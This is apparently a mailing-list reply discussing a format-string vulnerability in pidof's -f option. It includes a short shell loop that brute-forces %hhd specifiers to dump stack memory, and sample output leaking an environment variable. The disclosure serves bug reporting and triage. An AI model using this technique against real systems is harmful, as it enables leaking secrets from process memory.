> What's the attack vector here (making this an exploit rather than > "just" a bug)? >
I didn't investigate too much, but with a trivial brute force I can add %hhd at will until I dump what I need from the stack: $ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof teststring |grep -q teststring; do arg="$arg %hhd"; done $ ./pidof -f "$arg] mem: %s" pidof teststring [30286 0 -128 0 48 -45 -1 0 -112 -128 0 0 0 -40 0 0 0 120 -32 7 72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -48 8 -16 0 -96 116 8 -104 -16 -88 -92 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -64 0 -64 8 5 0 0 -96 1 -43 0 0 -32 0 -64 -16 0 0 0 19 0 8 0 -64 0 -124 -16 0 0 0 -124 -124 0 0 0 56 80 10 0 0 -16 0 0 30 -8 -96 5 -56 -48 -45 11] mem: teststring $ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof |grep -q SSH_AGENT_PID ; do arg="$arg %hhd"; done $ ./pidof -f "$arg] mem: %s" pidof [31295 0 -128 0 104 -49 -1 0 -112 -128 0 0 0 -40 0 0 0 120 32 7 72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 8 -16 0 -96 116 8 -104 -16 -24 -28 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -64 0 -64 72 4 0 0 -96 1 -43 0 0 -32 0 -64 -16 64 0 0 19 0 72 0 -64 0 -60 -16 64 0 0 -60 -60 0 0 0 112 80 10 0 0 -16 64 0 30 56 -96 4 -60 -52 -49 22 0 28 39] mem: SSH_AGENT_PID=892 Probably someone more skilled and motivated than me can do much better (or worse, depends). > Wouldn't you need to have some process which was passing untrusted > data > directly to the `-f` argument, is that likely in the real world? > > Ian. I hope not, but you can never know. Regards, -- Matteo Croce per aspera ad upstream
